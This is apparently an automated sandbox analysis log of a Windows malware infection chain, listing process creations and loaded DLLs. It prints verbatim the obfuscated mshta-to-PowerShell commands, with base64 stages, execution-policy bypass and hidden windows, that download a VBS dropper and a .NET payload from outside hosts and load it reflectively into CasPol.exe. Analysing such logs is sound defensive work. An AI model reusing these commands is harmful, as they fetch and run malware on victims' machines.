                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENTJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
